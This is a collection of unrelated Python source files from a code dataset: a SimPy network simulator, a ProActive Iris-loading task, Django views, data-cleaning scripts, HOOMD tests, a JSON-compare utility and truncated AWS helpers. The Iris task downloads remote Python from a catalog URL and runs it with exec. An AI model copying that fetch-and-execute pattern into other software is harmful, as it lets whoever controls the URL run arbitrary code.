next_packet_time(gen, lbd):\n return gen.exponential(lbd)\n\n packet_dst = partial(dstdist, self.gen, possible_destinations)\n next_pkt_time = partial(next_packet_time, self.gen, lbd)\n self.packet_generator = PacketGenerator(env=self.env, id=\"{}_pg\".format(self.id), adist=next_pkt_time, sdist=100, dstdist=packet_dst)\n\n ## LOOK AT THIS AGAIN - might want to consider putting it into a switch port\n self.packet_generator.out = self\n\n def get_port_id(self, dst_node_id):\n return \"{}_{}\".format(self.id, dst_node_id)\n\n def get_link_id(self, dst_node_id):\n return \"{}_{}\".format(self.id, dst_node_id)\n\n def add_connection(self, dst_node, rate, qlimit, monitor_rate, propagation_delay, bidirectional=False):\n port_id = self.get_port_id(dst_node.id)\n new_port = SwitchPort(self.env, rate=rate, qlimit=qlimit, limit_bytes=False, id=port_id)\n self.output_ports[port_id] = new_port\n\n link_id = self.get_link_id(dst_node.id)\n new_link = Link(self.env, id=link_id, cost=propagation_delay, dst=dst_node, src=self.id, switch_port=new_port)\n self.routes[link_id] = new_link\n\n new_port.out = new_link\n\n def dist(gen, lbd):\n return gen.exponential(lbd)\n\n port_monitor_id = new_port.id\n dist_partial = partial(dist, self.gen, monitor_rate)\n port_monitor = PortMonitor(self.env, port=new_port, dist=dist_partial)\n self.port_monitors[port_monitor_id] = port_monitor\n\n if bidirectional:\n dst_node.add_connection(self, rate, qlimit, monitor_rate, propagation_delay)\n\n def route(self, packet):\n return self.routing_algo.route_packet(packet)\n\n def get_output_port(self, portid):\n return self.output_ports[portid]\n\n def get_queue_port(self, portid):\n port = self.get_output_port(portid)\n return len(port.store.items)\n\n def get_queues(self):\n queues_dict = {k: self.get_queue_port(k) for k in self.output_ports}\n return queues_dict\n\n def put(self, packet):\n self.packets_received += 1\n if packet.dst == self.id:\n self.packet_sink.put(packet)\n else:\n self.incoming_packets.put(packet)\n print(\"Packet \" + str(packet.id) + \" put into node \" + str(self.id))\n\n def run(self):\n while True:\n packet = yield (self.incoming_packets.get())\n print(type(packet))\n outgoing_port = self.route(packet)\n if self.routes[outgoing_port].up:\n # Increment counter in packet\n packet.hops_travelled += 1\n packet.incrementRouteWeight(self.routes[outgoing_port.id].cost)\n packet.decrement_ttl()\n\n outgoing_port.put(packet)\n self.packets_sent += 1\n\ndef run():\n gen = RandomState(2)\n env = simpy.Environment()\n n1 = Node(env=env, id=\"n1\", gen=gen)\n n2 = Node(env=env, id=\"n2\", gen=gen)\n n3 = Node(env=env, id=\"n3\", gen=gen)\n n4 = Node(env=env, id=\"n4\", gen=gen)\n n5 = Node(env=env, id=\"n5\", gen=gen)\n n6 = Node(env=env, id=\"n6\", gen=gen)\n n1.set_routing_algo()\n n2.set_routing_algo()\n n3.set_routing_algo()\n n4.set_routing_algo()\n n5.set_routing_algo()\n n6.set_routing_algo()\n\n n1.add_connection(n2, rate=500, qlimit=64, monitor_rate=1, propagation_delay=5)\n n1.add_connection(n3, rate=500, qlimit=64, monitor_rate=1, propagation_delay=5)\n n2.add_connection(n4, rate=500, qlimit=64, monitor_rate=1, propagation_delay=5)\n n4.add_connection(n6, rate=500, qlimit=64, monitor_rate=1, propagation_delay=5)\n n3.add_connection(n5, rate=500, qlimit=64, monitor_rate=1, propagation_delay=5)\n n5.add_connection(n6, rate=500, qlimit=64, monitor_rate=1, propagation_delay=5)\n\n pkt = Packet(1, size=1, id=1, src=n1.id, dst=n6.id)\n n1.put(pkt)\n\n env.run(until=100)\n\nrun()","sub_path":"Network_environment/env/JoaoCode/minhrun1.py","file_name":"minhrun1.py","file_ext":"py","file_size_in_byte":6713,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"376342124","text":"# -*- coding: utf-8 -*-\n\"\"\"Proactive Load Iris Dataset for Machine Learning\n\nThis module contains the Python script for the Load Iris Dataset task.\n\"\"\"\nimport urllib.request\nimport pandas as pd\n\nglobal variables, resultMetadata\n\n__file__ = variables.get(\"PA_TASK_NAME\")\nprint(\"BEGIN \" + __file__)\n\n# -------------------------------------------------------------\n# Import an external python script containing a collection of\n# common utility Python functions and classes\nPA_CATALOG_REST_URL = variables.get(\"PA_CATALOG_REST_URL\")\nPA_PYTHON_UTILS_URL = PA_CATALOG_REST_URL + \"/buckets/machine-learning-scripts/resources/Utils/raw\"\nexec(urllib.request.urlopen(PA_PYTHON_UTILS_URL).read(), globals())\nglobal check_task_is_enabled, preview_dataframe_in_task_result\nglobal compress_and_transfer_dataframe_in_variables\nglobal assert_not_none_not_empty\n\n# -------------------------------------------------------------\n# Check if the Python task is enabled or not\ncheck_task_is_enabled()\n\n# -------------------------------------------------------------\n# Get data from the propagated variables\n#\nFILE_URL = variables.get(\"FILE_URL\")\nFILE_DELIMITER = variables.get(\"FILE_DELIMITER\")\nLABEL_COLUMN = variables.get(\"LABEL_COLUMN\")\n\nassert_not_none_not_empty(FILE_URL, \"FILE_URL should be defined!\")\nassert_not_none_not_empty(FILE_DELIMITER, \"FILE_DELIMITER should be defined!\")\n\ndataframe = pd.read_csv(FILE_URL, FILE_DELIMITER)\n\n# -------------------------------------------------------------\n# Transfer data to the next tasks\n#\ndataframe_id = compress_and_transfer_dataframe_in_variables(dataframe)\nprint(\"dataframe id (out): \", dataframe_id)\n\nresultMetadata.put(\"task.name\", __file__)\nresultMetadata.put(\"task.dataframe_id\", dataframe_id)\nresultMetadata.put(\"task.label_column\", LABEL_COLUMN)\n\n# -------------------------------------------------------------\n# Preview results\n#\npreview_dataframe_in_task_result(dataframe)\n\n# -------------------------------------------------------------\nprint(\"END \" + __file__)\n","sub_path":"MachineLearningScripts/resources/catalog/Load_Iris_Dataset.py","file_name":"Load_Iris_Dataset.py","file_ext":"py","file_size_in_byte":2002,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"485211284","text":"\n\nfrom xai.brain.wordbase.nouns._atrium import _ATRIUM\n\n#calss header\nclass _ATRIUMS(_ATRIUM, ):\n\tdef __init__(self,): \n\t\t_ATRIUM.__init__(self)\n\t\tself.name = \"ATRIUMS\"\n\t\tself.specie = 'nouns'\n\t\tself.basic = \"atrium\"\n\t\tself.jsondata = {}\n","sub_path":"xai/brain/wordbase/nouns/_atriums.py","file_name":"_atriums.py","file_ext":"py","file_size_in_byte":238,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"244830900","text":"def part1(data):\n totalSquareFeet = 0\n for eachPresent in data.splitlines():\n l, w, h = eachPresent.split('x')\n l, w, h = int(l), int(w), int(h)\n slack = min(l * w, w * h , h * l)\n l, w, h = 2 * l * w, 2 * w * h, 2 * h * l\n totalSquareFeet += l + w + h + slack\n return totalSquareFeet\n\n\ndef part2(data):\n totalRibbon = 0\n for eachPresent in data.splitlines():\n presentRibbon = 0\n l, w, h = eachPresent.split('x')\n l, w, h = int(l), int(w), int(h)\n bow = l * w * h \n sides = [ l, w, h ]\n sides.remove(max(sides))\n for eachSide in sides:\n presentRibbon += eachSide * 2\n presentRibbon += bow \n totalRibbon += presentRibbon \n return totalRibbon\n\n\n","sub_path":"Python3.7/2015/Day02.py","file_name":"Day02.py","file_ext":"py","file_size_in_byte":770,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"158243671","text":"\"\"\" Copyright 2012, 2013 UW Information Technology, University of Washington\n\n Licensed under the Apache License, Version 2.0 (the \"License\");\n you may not use this file except in compliance with the License.\n You may obtain a copy of the License at\n\n http://www.apache.org/licenses/LICENSE-2.0\n\n Unless required by applicable law or agreed to in writing, software\n distributed under the License is distributed on an \"AS IS\" BASIS,\n WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n See the License for the specific language governing permissions and\n limitations under the License.\n\"\"\"\nfrom django.shortcuts import render_to_response\nfrom django.template import RequestContext\nfrom django.conf import settings\nfrom django.utils.translation import ugettext as _\nimport simplejson as json\nimport urllib\nfrom django.utils.datastructures import SortedDict\nfrom mobility.decorators import mobile_template\nfrom django.core.exceptions import ImproperlyConfigured\nimport re\nfrom spacescout_web.spot import SpotFavorite, SpotShare, Spot, SpotException, get_building_json\n\n@mobile_template('spacescout_web/{mobile/}app.html')\ndef HomeView(request, template=None):\n # The preference order is cookie, config, then some static values\n # That fallback order will also apply if the cookie campus isn't in\n # settings.\n campus = None\n\n if hasattr(settings, \"SS_LOCATIONS\"):\n m = re.match(r'^/([a-z]+)/', request.path)\n if m and m.group(1) in settings.SS_LOCATIONS:\n campus = m.group(1)\n\n if campus is None:\n cookies = request.COOKIES\n if \"default_location\" in cookies:\n cookie_value = cookies[\"default_location\"]\n # The format of the cookie is this, urlencoded:\n # lat,long,campus,zoom\n campus = urllib.unquote(cookie_value).split(',')[2]\n \n if not location in settings.SS_LOCATIONS:\n location = None\n\n if campus is None:\n if hasattr(settings, 'SS_DEFAULT_LOCATION'):\n campus = settings.SS_DEFAULT_LOCATION\n\n spaces, template_values = get_campus_data(request, campus)\n\n spaces = json.dumps(spaces)\n\n # Default to zooming in on the UW Seattle campus if no default location is set\n if hasattr(settings, 'SS_DEFAULT_LOCATION'):\n default_location = settings.SS_DEFAULT_LOCATION\n locations = settings.SS_LOCATIONS\n\n if (hasattr(settings, 'SS_BUILDING_CLUSTERING_ZOOM_LEVELS') and hasattr(settings, 'SS_DISTANCE_CLUSTERING_RATIO')):\n by_building_zooms = settings.SS_BUILDING_CLUSTERING_ZOOM_LEVELS\n by_distance_ratio = settings.SS_DISTANCE_CLUSTERING_RATIO\n else:\n raise ImproperlyConfigured(\"You need to configure your clustering constants in settings.py or local_settings.py\")\n\n log_shared_space_reference(request)\n\n buildings = json.loads(get_building_json(request=request))\n\n favorites_json = SpotFavorite(None, request=request).get_json()\n\n # This could probably be a template tag, but didn't seem worth it for one-time use\n #TODO: hey, actually it's probably going to be a Handlebars helper and template\n buildingdict = SortedDict()\n for building in buildings:\n try:\n if not building[0] in buildingdict.keys(): # building[0] is the first letter of the string\n buildingdict[building[0]] = []\n\n buildingdict[building[0]].append(building)\n except:\n pass\n\n params = {\n 'username' : request.user.username if request.user and request.user.is_authenticated() else '',\n 'center_latitude': template_values['center_latitude'],\n 'center_longitude': template_values['center_longitude'],\n 'zoom_level': template_values['zoom_level'],\n 'locations': locations,\n 'default_location': default_location,\n 'by_building_zooms': by_building_zooms,\n 'by_distance_ratio': by_distance_ratio,\n 'buildingdict': buildingdict,\n 'spaces': spaces,\n 'favorites_json': favorites_json,\n }\n\n response = render_to_response(template, params, context_instance=RequestContext(request))\n response['Cache-Control'] = 'no-cache'\n return response\n\n\ndef get_campus_data(request, campus):\n # Only fetch space data if we are doing an default load; otherwise\n # the page JS will just ignore what we do here and perform its\n # own search query\n spot = Spot(None, request=request)\n\n if not request.COOKIES.get('spacescout_search_opts', None):\n spaces, location = spot.get_campus(campus)\n else:\n spaces, location = [], spot.get_location(campus)\n\n return spaces, location\n\ndef log_shared_space_reference(request):\n # log shared space references\n m = re.match(r'^/space/(\\d+)/.*/([a-f0-9]{32})$', request.path)\n if m:\n try:\n share = SpotShare(m.group(1), request=request)\n share.put_shared(m.group(2))\n except:\n # best effort, ignore response\n pass\n","sub_path":"views/home.py","file_name":"home.py","file_ext":"py","file_size_in_byte":5067,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"392928049","text":"from django.conf.urls import patterns, include, url\nfrom django.contrib import admin\nfrom template_app.views import TemplatePreviewView, TemplateListView, TemplateDetailView\n\nurlpatterns = patterns('',\n url(r'^$',\n TemplateListView.as_view(), \n name=\"template_list_view\"),\n\n url(r'^template/(?P[-\\w]+)/$',\n TemplatePreviewView.as_view(), \n name=\"template_preview_view\"),\n\n url(r'^template/info/(?P[-\\w]+)/$',\n TemplateDetailView.as_view(), \n name=\"template_detail_view\"),\n\n\n\n)\n\n","sub_path":"template_app/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":721,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"608347812","text":"# GNBR_clean_part_ii_files.py\n# Written: 04/26/18\n# Last updated: 04/26/18\n\"\"\"\nThis code parses and cleans the raw part-ii files of the GNBR network.\n\"\"\"\n\nimport gzip\nimport sys\nimport numpy as np\nfrom gnbr_parse_utils import *\n\n# Check input and print usage if number of arguments is invalid\nif len(sys.argv) != 3:\n\tprint(\"Error: wrong number of arguments, check usage statement below:\\n\")\n\tprint(\"USAGE: python GNBR_2_csv.py \")\n\texit()\n\n# Assign input file paths to their variables\ndepPathFile = sys.argv[1]\noutFile = sys.argv[2]\n\n# Default file header for the part-ii files\npart_ii_header = [\n \"pmid\", \"loc\", \n \"subj_name\", \"subj_loc\", \n \"obj_name\", \"obj_loc\",\n \"subj_name_raw\", \"obj_name_raw\", \n \"subj_id\", \"obj_id\", \n \"subj_type\", \"obj_type\", \"species\",\n \"path\", \"text\"\n ] \n\n# Open buffer to out csv file\nout_partii_CSV=open_csv(outFile)\n\n# Write header to file\nout_partii_CSV.writerow(part_ii_header)\n\n# Iterate over file lines and clean the data\nwith open(depPathFile, \"r\") as dpathIn:\n for line in dpathIn.readlines():\n info = line.strip().split(\"\\t\")\n\n # Omit entry if either entity is missing an identifier\n if info[8] == \"null\" or info[9] == \"null\":\n continue\n\n # GNBR uses \";\" to mark unresolved entities, so we exclude these from our cleaned data\n if \";\" in info[8] or \";\" in info[9]:\n continue\n\n if \"gene\" in depPathFile:\n # Prepend ncbigene prefix to genes, for data provinence \n if \"MESH:\" not in info[8]:\n info[8] = \"ncbigene:\" + info[8]\n if \"MESH:\" not in info[9]:\n info[9] = \"ncbigene:\" + info[9]\n \n # Get species used in the study\n if \"(Tax:\" in info[9]:\n temp = info[9].split(\"(\")\n info[9] = temp[0]\n species = temp[1].strip(\"Tax:\").strip(\")\")\n\n if \"(Tax:\" in info[8]:\n temp = info[8].split(\"(\")\n info[8] = temp[0]\n species = temp[1].strip(\"Tax:\").strip(\")\")\n\n else:\n species = \"9606\"\n else:\n species = \"9606\"\n # Convert dependency paths to lowercase to make them consistent with part-i files\n info[12] = info[12].lower()\n\n # Add in species as separate column\n info = info[:12] + [species] + info[12:]\n\n # Write cleaned line to file\n out_partii_CSV.writerow(info)\n\n","sub_path":"code/old_stuff/neo4j_v0_5/clean_part_ii_files.py","file_name":"clean_part_ii_files.py","file_ext":"py","file_size_in_byte":2523,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"620913593","text":"import pandas as pd\n\n\ndef submitter(y_pred_test):\n \"\"\"\n saves './submissions.csv'\n \"\"\"\n df = pd.DataFrame({\"y\": y_pred_test})\n df.index += 0.0\n df.index.name = 'id'\n df.to_csv('submission.csv')\n","sub_path":"utils/submitter.py","file_name":"submitter.py","file_ext":"py","file_size_in_byte":215,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"314894546","text":"from __future__ import print_function\nfrom __future__ import division\nfrom hoomd import *\nfrom hoomd import hpmc\nimport math\nimport unittest\n\ncontext.initialize()\n\nclass test_clusters_spheres (unittest.TestCase):\n def setUp(self):\n # setup the MC integration\n self.system = init.create_lattice(lattice.sc(a=1.3782337338022654),n=[5,5,5]) #target a packing fraction of 0.2\n self.mc = hpmc.integrate.sphere(seed=123)\n\n self.mc.shape_param.set('A', diameter=1.0)\n self.clusters = hpmc.update.clusters(self.mc, seed=54321, period=1)\n\n def test_set_params(self):\n self.clusters.set_params(move_ratio=0.2)\n self.clusters.set_params(flip_probability=0.8)\n\n def test_integrate(self):\n run(100)\n\n if comm.get_num_ranks() == 1:\n self.assertAlmostEqual(self.clusters.get_pivot_acceptance(),1.0)\n else:\n # in MPI, there are inactive boundaries\n self.assertTrue(self.clusters.get_pivot_acceptance() > 0)\n\n self.assertTrue(self.clusters.get_reflection_acceptance() > 0)\n\n def test_binary_spheres(self):\n self.system.particles.types.add('B')\n self.mc.shape_param.set('B',diameter=1.0)\n self.clusters.set_params(swap_types=['A','B'], swap_move_ratio=0.5, delta_mu=0)\n run(100)\n\n g = group.type(type='B',name='B')\n self.assertTrue(len(g) > 0)\n if comm.get_num_ranks() == 1:\n self.assertAlmostEqual(self.clusters.get_swap_acceptance(),1.0)\n else:\n self.assertTrue(self.clusters.get_swap_acceptance() > 0)\n\n # set a finite chemical potential difference\n self.clusters.set_params(delta_mu=0.1)\n run(100)\n self.assertTrue(self.clusters.get_swap_acceptance()<1.0)\n\n def tearDown(self):\n del self.clusters\n del self.mc\n del self.system\n context.initialize();\n\nif __name__ == '__main__':\n unittest.main(argv = ['test.py', '-v'])\n","sub_path":"hoomd/hpmc/test-py/test_clusters.py","file_name":"test_clusters.py","file_ext":"py","file_size_in_byte":1967,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"302276552","text":"# -*- coding: utf-8 -*-\n# @Time : 2018/2/26 11:14\n# @Author : zhao.chencheng\n# @Email : 907779487@qq.com\n# @File : Delect_file.py\n# @Software: PyCharm Community Edition\nimport os\nclass Del_file():\n '''清空某个目录'''\n def delect_file(self,path):\n ls = os.listdir(path)\n for i in ls:\n c_path = os.path.join(path, i)\n if os.path.isdir(c_path):\n Del_file().delect_file(c_path)\n else:\n os.remove(c_path)\nif __name__ == '__main__':\n path = r\"G:\\github\\UTT_python\\Autotest_2018\\screen_shoot\"\n Del_file().delect_file(path)","sub_path":"Autotest_2018/public_script/Delect_file.py","file_name":"Delect_file.py","file_ext":"py","file_size_in_byte":619,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"436741013","text":"#!/usr/bin/env python3\nimport argparse\nimport hashlib\nimport multiprocessing \nfrom pathlib import Path\n\n\nDIGEST = {}\n\n\ndef show_result(flipped):\n \"\"\"Show the path of the files that already exist.\n\n :param flipped dict: each values are lists with duplicates files.\n \"\"\"\n print(\"...........finished.............\")\n print(\"................................\")\n\n for k, v in flipped.items():\n if len(v) > 1:\n print('Duplicate files founded :')\n for f in v:\n print(' - ',f)\n print(\"................................\")\n print(\".............done...............\")\n\n\ndef comparate_digest():\n \"\"\"Check and return duplicates files.\"\"\"\n flipped = {}\n\n for key, value in DIGEST.items():\n if value not in flipped:\n flipped[value] = [key]\n else:\n flipped[value].append(key) \n\n show_result(flipped)\n\n\ndef sha256(path):\n \"\"\"Hash the content file.\n\n :param path str: path to the file.\n \"\"\"\n # I choose sha256 to maximum avoid hash collision.\n m = hashlib.sha256()\n print('analysing :',path)\n with open(path, \"rb\") as f:\n # Read chunks of 4096 bytes sequentially to be memory efficient.\n for chunk in iter(lambda: f.read(4096), b\"\"):\n m.update(chunk)\n return m.digest()\n\n\ndef analyse_content(gen):\n \"\"\"Execute hash for each selected files.\"\"\"\n all_files = [file for file in gen]\n\n for file in all_files:\n file_obj = Path(file)\n\n if file_obj.is_file():\n pathname = file_obj.__str__()\n with multiprocessing.Pool() as pool:\n res = pool.map(sha256, (pathname,))\n DIGEST[pathname] = res[0]\n\n comparate_digest()\n\n\ndef main():\n parser = argparse.ArgumentParser(\n prog='DoIexist ?',\n formatter_class=argparse.RawDescriptionHelpFormatter,\n description=\"\"\"Check if a file already exists.\n\n examples:\n - Check actual folder and sub directories\n $ ./main.py -r\n - Check files in specific folder\n $ ./main.py --path /home/user/dir\n \"\"\")\n parser.add_argument('--path',\n help='Enter the path where you want to search',\n type=str)\n parser.add_argument('-r', action='store_true', help='Enable recursivity')\n args = parser.parse_args()\n path = args.path\n recursive = args.r\n\n # Check the path given by the user.\n if path:\n p = Path(path)\n else:\n p = Path('.')\n\n # if recursive, we search across all folders from the given path.\n if recursive:\n gen = p.glob('**/*')\n else:\n gen = p.glob('*')\n\n print('................................')\n print('......... processing ...........')\n print('................................')\n print('......wait for the result.......')\n print('................................')\n analyse_content(gen)\n\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2969,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"348670106","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [('apis', '0005_fundget_result'), ]\n\n operations = [\n migrations.AddField(\n model_name='fundget',\n name='organization',\n field=models.ForeignKey(null=True,\n to='apis.Organization'),\n ),\n migrations.AlterField(\n model_name='fundget',\n name='project',\n field=models.CharField(default='',\n blank=True,\n max_length=100),\n ),\n migrations.AlterField(\n model_name='fundget',\n name='result',\n field=models.TextField(default='未公佈',\n blank=True),\n ),\n ]\n","sub_path":"src/apis/migrations/0006_auto_20151102_0844.py","file_name":"0006_auto_20151102_0844.py","file_ext":"py","file_size_in_byte":901,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"178913576","text":"from os import path\nfrom codecs import open\nfrom setuptools import setup, find_packages\n\n\nNAME = 'raspistream'\nVERSION = '0.1.1'\nDESCRIPTION = 'RTMP(s) streaming for RaspberryPi 3 + PiSound & PiCam'\nAUTHOR = 'MrFranipane'\nAUTHOR_EMAIL = 'contact@frangipane.me'\n\n\n_here = path.abspath(path.dirname(__file__))\n_readme_filepath = path.join(_here, 'README.md')\n_requirements_filepath = path.join(_here, 'requirements.txt')\n\n\nif path.isfile(_readme_filepath):\n with open(_readme_filepath, encoding='utf-8') as readme_file:\n _long_description = readme_file.read()\nelse:\n _long_description = 'Unable to load README.md'\n\n\nif path.isfile(_requirements_filepath):\n with open(_requirements_filepath) as requirements_file:\n _requirements = requirements_file.readlines()\nelse:\n _requirements = list()\n\n\nsetup(\n name=NAME,\n version=VERSION,\n description=DESCRIPTION,\n long_description=_long_description,\n author=AUTHOR,\n author_email=AUTHOR_EMAIL,\n packages=find_packages(exclude=['tests']),\n install_requires=_requirements,\n include_package_data=True\n)\n","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1093,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"460363793","text":"# uncompyle6 version 3.6.7\n# Python bytecode 3.8 (3413)\n# Decompiled from: Python 3.8.2 (tags/v3.8.2:7b3ab59, Feb 25 2020, 23:03:10) [MSC v.1916 64 bit (AMD64)]\n# Embedded file name: build\\bdist.win32\\egg\\atapibasiclib\\jsoncompare.py\n# Compiled at: 2019-12-24 22:13:18\n# Size of source mod 2**32: 10627 bytes\nimport copy, json, re\nfrom collections import Counter\n\ndef json_comp(dictobj1, dictobj2={}):\n \"\"\"\n 【功能】比较两个字典类型是否是包含关系\n 【参数】dictobj1:字典类型\n dictobj2:字典类型\n 【结果】如果dictobj2中的键值对在dictobj1中都存在,且路径一致,则认为存在包含关系,否则不存在包含关系\n \"\"\"\n if dictobj2 is {}:\n return True\n else:\n if not isinstance(dictobj1, dict):\n dictobj1 = json.loads(dictobj1)\n dictobj2 = isinstance(dictobj2, dict) or json.loads(dictobj2)\n values_dictobj2 = list(all_list(getvalues(dictobj2, result=[])).keys())\n fp_dictobj1 = find_path(dictobj1)\n fp_dictobj2 = find_path(dictobj2)\n result = True\n for value in values_dictobj2:\n the_value_path_dictobj1 = list(set(fp_dictobj1.the_value_path(value)))\n the_value_path_dictobj2 = list(set(fp_dictobj2.the_value_path(value)))\n the_value_path_dictobj1 = resetpathindex(the_value_path_dictobj1)\n the_value_path_dictobj2 = resetpathindex(the_value_path_dictobj2)\n print('the_value_path_dictobj1=%s' % the_value_path_dictobj1)\n print('the_value_path_dictobj2=%s' % the_value_path_dictobj2)\n if set(the_value_path_dictobj2) <= set(the_value_path_dictobj1):\n pass\n else:\n result = False\n\n return result\n\n\nclass find_path:\n\n def __init__(self, target):\n self.target = target\n\n def find_the_value(self, target, value, path='', path_list=None):\n \"\"\"完全匹配,每经过一层(list、dict)都会记录path,到了最后一层且当前target就是要找的目标,才把对应的path记录下来\n :param target: 被搜索的目标\n :param value: 要搜索的关键字\n :param path: 当前所在的路径\n :param path_list: 存放所有path的列表\n 判断当前target类型:···是字典,循环内容,每个键值都记录下路径path,然后以当前值v为判断target,调用自身传入添加了的path判断\n ···是列表,循环内容,每个元素都记录下路径path,然后以当前元素���判断target,调用自身传入添加了的path判断\n ···是str或者int,那么就判断当前target是否就是要搜索的value,如果是,那就把路径path放进list里面\"\"\"\n if isinstance(target, dict):\n for k, v in target.items():\n path1 = copy.deepcopy(path)\n path1 = path1 + str([k])\n self.find_the_value(v, value, path1, path_list)\n\n elif isinstance(target, (list, tuple)):\n for i in target:\n path1 = copy.deepcopy(path)\n posi = target.index(i)\n path1 = path1 + '[%s]' % posi\n self.find_the_value(i, value, path1, path_list)\n\n elif isinstance(target, (str, int)) and str(value) == str(target):\n path_list.append(path)\n\n def find_in_value(self, target, value, path='', path_list=None):\n \"\"\"包含匹配,内容跟上面一样,只是最后判断时不同\"\"\"\n if isinstance(target, dict):\n for k, v in target.items():\n path1 = copy.deepcopy(path)\n path1 = path1 + str([k])\n self.find_in_value(v, value, path1, path_list)\n\n elif isinstance(target, (list, tuple)):\n for i in target:\n path1 = copy.deepcopy(path)\n posi = target.index(i)\n path1 = path1 + '[%s]' % posi\n self.find_in_value(i, value, path1, path_list)\n\n elif isinstance(target, (str, int)) and str(value) in str(target):\n path_list.append(path)\n\n def find_the_key(self, target, key, path='', path_list=None):\n \"\"\"查找key,每经过一层(list、dict)都会记录path,在字典时,若当前的k就是要找的key,那就把对应的path记录下来\n :param target: 被搜索的目标\n :param key: 要搜的键\n :param path: 当前所在的路径\n :param path_list: 存放所有path的列表\n 判断当前target类型:···是字典,循环内容,每个键值都记录下路径path,判断当前k是否要查找的:~~~是,那就把路径path放进list里面\n ~~~不是,以当前值v为判断target,调用自身传入添加了的path判断\n ···是列表,循环内容,每个元素都记录下路径path,然后以当前元素为判断target,调用自身传入添加了的path判断\n \"\"\"\n if isinstance(target, dict):\n for k, v in target.items():\n path1 = copy.deepcopy(path)\n path1 = path1 + str([k])\n if str(key) == str(k):\n path_list.append(path1)\n else:\n self.find_the_key(v, key, path1, path_list)\n\n else:\n if isinstance(target, (list, tuple)):\n for i in target:\n path1 = copy.deepcopy(path)\n posi = target.index(i)\n path1 = path1 + '[%s]' % posi\n self.find_the_key(i, key, path1, path_list)\n\n def in_value_path(self, value):\n \"\"\"包含匹配value\"\"\"\n path_list = []\n self.find_in_value((self.target), value, path_list=path_list)\n return path_list\n\n def the_value_path(self, value):\n \"\"\"完全匹配value\"\"\"\n path_list = []\n self.find_the_value((self.target), value, path_list=path_list)\n return path_list\n\n def the_key_path(self, value):\n \"\"\"只查找key\"\"\"\n path_list = []\n self.find_the_key((self.target), value, path_list=path_list)\n return path_list\n\n\ndef getvalues(dic, result):\n \"\"\"\n 【功能】根据传入的字典类型参数,获取其每个键值对的值\n 【参数】dic:传入的字典类型参数\n result:列表类型,存在dic中的每个键值对的值\n \"\"\"\n count = 0\n keys = dic.keys()\n for key in keys:\n value = dic.get(key)\n if isinstance(value, dict):\n getvalues(value, result)\n elif isinstance(value, list):\n for ls in value:\n if isinstance(ls, dict):\n getvalues(ls, result)\n else:\n result.append(value)\n\n else:\n result.append(value)\n\n return result\n\n\ndef all_list(arr):\n \"\"\"\n 【功能】去除列表中的重复值\n 【参数】arr:列表类型\n 【结果】返回不含重复值的列表\n \"\"\"\n result = {}\n for i in set(arr):\n result[i] = arr.count(i)\n\n return result\n\n\ndef resetpathindex(lst):\n \"\"\"\n 【功能】将一个字典路径中包含的数组下标进行重置\n 【参数】lst:期望被重置的字典路径数组\n 【结果】被重置后的字典路径 ���如:[\"['result'][2]['orgCodeList'][3]\", \"['result'][2]['orgCodeList'][3]\",\"['result']['companies'][3]['orgCode']\", \"['result']['ownOrgCode']\"]\n 重置后为:[\"['result'][0]['orgCodeList'][0]\", \"['result'][1]['orgCodeList'][1]\", \"['result']['companies'][0]['orgCode']\", \"['result']['ownOrgCode']\"]\n \"\"\"\n for i in range(len(lst)):\n ls = re.findall('\\\\[+\\\\d+\\\\]+', str(lst[i]))\n for j in range(len(ls)):\n lst[i] = lst[i].replace(ls[j], '[]')\n\n list_count = Counter(lst)\n for key in list_count:\n index = 0\n\n if list_count[key] > 1:\n for k in range(len(lst)):\n if lst[k] == key:\n lst[k] = lst[k].replace('[]', '[' + str(index) + ']')\n index += 1\n index = 0\n\n else:\n if list_count[key] == 1:\n for k in range(len(lst)):\n lst[k] = lst[k].replace('[]', '[' + str(index) + ']')\n\n index = 0\n return lst","sub_path":"pycfiles/api_bible_sdk-0.1.1.tar/jsoncompare.cpython-38.py","file_name":"jsoncompare.cpython-38.py","file_ext":"py","file_size_in_byte":8484,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"328276042","text":"import boto3\n\nfrom helpers import write_secret\n\n\nREAD_ONLY_ROLE_ARN = \"arn:aws:iam::975596993436:role/storage-read_only\"\nDEV_ROLE_ARN = \"arn:aws:iam::975596993436:role/storage-developer\"\n\n\nsts_client = boto3.client(\"sts\")\n\n\ndef get_aws_resource(resource, *, role_arn=READ_ONLY_ROLE_ARN):\n assumed_role_object = sts_client.assume_role(\n RoleArn=role_arn, RoleSessionName=\"AssumeRoleSession1\"\n )\n credentials = assumed_role_object[\"Credentials\"]\n return boto3.resource(\n resource,\n aws_access_key_id=credentials[\"AccessKeyId\"],\n aws_secret_access_key=credentials[\"SecretAccessKey\"],\n aws_session_token=credentials[\"SessionToken\"],\n )\n\n\ndef get_aws_client(resource, *, role_arn=READ_ONLY_ROLE_ARN):\n assumed_role_object = 